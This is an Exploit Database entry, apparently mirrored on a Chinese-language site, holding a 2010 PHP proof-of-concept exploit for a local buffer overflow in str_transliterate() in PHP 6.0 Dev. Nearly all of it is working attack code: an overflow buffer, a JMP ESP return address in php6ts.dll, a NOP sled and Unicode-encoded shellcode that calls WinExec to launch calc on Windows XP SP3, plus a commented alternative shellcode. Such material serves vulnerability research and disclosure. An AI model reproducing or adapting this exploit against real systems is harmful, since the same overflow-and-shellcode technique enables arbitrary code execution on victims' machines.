PHP 6.0 Dev – ‘str_transliterate()’ Local Buffer Overflow

• Exploit Database
• 10 阅读

• 作者： Yakir Wizman
  日期： 2010-04-04
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12051/

• <?php
  error_reporting(0);
  #####################################################################
  ## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
  ## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
  ## Buffer Overflow
  ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
  ## Exploited by TheLeader, Debug
  ## SP. Thanks: HDM
  ## http://www.nullbyte.org.il
  #####################################################################
  ## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
  ## Take a look, 'unicode.semantics' has to be on!
  ## php.ini > unicode.semantics = on
  #####################################################################
  if(ini_get_bool('unicode.semantics')) {
   $buff = str_repeat("\u4141", 256);
   $eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
   $nops = str_repeat("\u9090", 20);
  
   # WinExec Calc XP SP3 HEB Unicode-encoded shellcode
   $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";
   
   # WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
   # $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E";
   
   $exploit = $buff.$eip.$nops.$shellcode;
   str_transliterate(0, $exploit, 0);
  } else {
   exit("Error! 'unicode.semantics' has be on!\r\n");
  }
  
  function ini_get_bool($a) {
   $b = ini_get($a);
   switch (strtolower($b)) {
  case 'on':
  case 'yes':
  case 'true':
   return 'assert.active' !== $a;
  case 'stdout':
  case 'stderr':
   return 'display_errors' === $a;
  default:
   return (bool) (int) $b;
   }
  }
  ?>